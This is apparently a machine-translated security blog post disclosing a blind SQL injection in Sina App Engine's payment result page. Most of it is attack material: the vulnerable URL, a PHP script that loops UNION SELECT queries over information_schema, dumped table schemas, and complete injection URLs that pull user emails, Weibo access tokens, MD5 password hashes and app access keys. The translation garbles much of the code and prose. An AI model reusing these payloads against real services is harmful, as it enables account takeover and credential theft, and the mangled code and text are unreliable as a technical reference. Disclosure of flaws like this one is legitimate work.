The fall of Sina SAE, oauth token/security password leaks, and any hack app

In the afternoon, I was going to try the text message function for several yunbeans in SAES. because I haven't had a black box for a long time, I just wanted to see the payment problem, but I found another vulnerability. I can get all the information you think of on SAES, endangering all users, the website was easily taken away by the Internet (this station was built on SAES), and the idea of falling into any SAES was tested...
 
However, the official team can rest assured that they did not drag the database or view the order information. Fix the issue quickly :)
PS: I didn't expect it. I haven't studied the sae sandbox environment yet. I found a short board on the main site and it was terrible.

The problem is ultimately an SQL injection. Why is there an injection for SAE? Why can't I get an injection from SAE after I have slapped myself ?!
Generally, the security team of sina can find problems clearly, and they will also be inspected by road hackers. With intuition, the problems will appear in some corners and some places that are not noticed by others, here:
 
Http://sae.sina.com.cn/pay/result/xft? Sae_internal = 1 & may_fail = 0 & order_id = 1
I ran a payment information feedback page with sqlmap. This silly weakness tells me that I can only perform blind injection... Write a temporary script to run the database.
 
 
<? Php
$ Url = "http://sae.sina.com.cn/pay/result/xft? Sae_internal = 1 & may_fail = 0 & order_id = 1 '";
 
For ($ I = 0; $ I <1000; $ I ++) {// pretty nice ..
$ Res = explode ("|", curlrequest ($ url. urlencode ("and 1 = 2 union select 1, concat (0x7c, COLUMN_NAME, 0x7c), 3,4, 5 from information_schema.COLUMNS where TABLE_NAME = 'user' limit $ I, 1 #")));
Echo $ res [10]. "\ r \ n ";
}
 
Omit curl Definition
 
Partial data
 
Database:
Information_schema
App_store
Cron
Cron2
Cron_result
Mysql_stat
Sae
Sae_java
Sae_nodejs
SwsUser
Test
Xweibo
 
Admin table->
Id
Sws_uid
Name
Password
Email
Timeline
Role
S_mail
Mobile
 
App table stores app-related information, such as name \ accesskey -->
Name
Cn_name
Api_version
Biz_type
Desp
Default_version
Cname
Create_uid
Accesskey
Group_name
Pool_name
Svn_url
Status
Timeline
Mysql_port
Old_status
Hash
Cookie
Platform
Lang
App_type
Middle_type
Icon
Status_flags
Delete_time
 
The user table stores all user information, including uid, oauth, email, and sae secondary security passwords -->
Id
Name
Email
Password_md5
Mobile
Tel
Status
Timeline
Expires
Sws_uid
Old_status
Level
Deleted
Money
Platform
Beans_level
Mobile_verified
Mobile_reverified
Is_active
Weibo_uid
Weibo_name
Email_verified
Weibo_access_token
Devlevel
Vdun
Olevel
Level_endtime
Level_policy
Up_welcomed
Appmid
Is_qy_vendor
Last_update
UserName
 
Without excessive guesses, you can directly query user-related information on the Internet.
Http://sae.sina.com.cn//pay/result/xft? Sae_internal = 1 & may_fail = 0 & order_id =-1% 27% 20and % 201 = 2% 20 union % 20 select % 201, concat % 280x7c, email, 0x7c, weibo_name, 0x7c, weibo_access_token, 0x7c, password_md5, 0x7c % 29,3, 4,5% 20 from % 20sae. user % 20 where % 20weibo_uid = '000000' % 20 limit % 1627825392, 1% 23
 
 
 



 
 
The md5 password is the second security password of sae. This password also serves niubi, which will be explained later.
 
You can also query the accesskey
Http://sae.sina.com.cn//pay/result/xft? Sae_internal = 1 & may_fail = 0 & order_id =-1% 27% 20and % 201 = 2% 20 union % 20 select % 201, concat % 280x7c, accesskey, 0x7c, create_uid, 0x7c % 29,3, 4,5% 20 from % 20sae. app % 20 limit % 200,1% 23
 
 
 
We can see that all the information required to control an app is complete ..
 
Over 8, you can also use a simpler method. svn and sae svn passwords are the second security password of sae.
 
 
 
 








 
 
 
All right, try hacking out any app on SAES.

 
 
 


 
 
 
 
After the proof is completed, paste it.
Solution:

In fact, it is just an injection, but the database is so transparent that it cannot be understood, permissions ..
You can find all the information you want in the database. Do you need to reflect on it?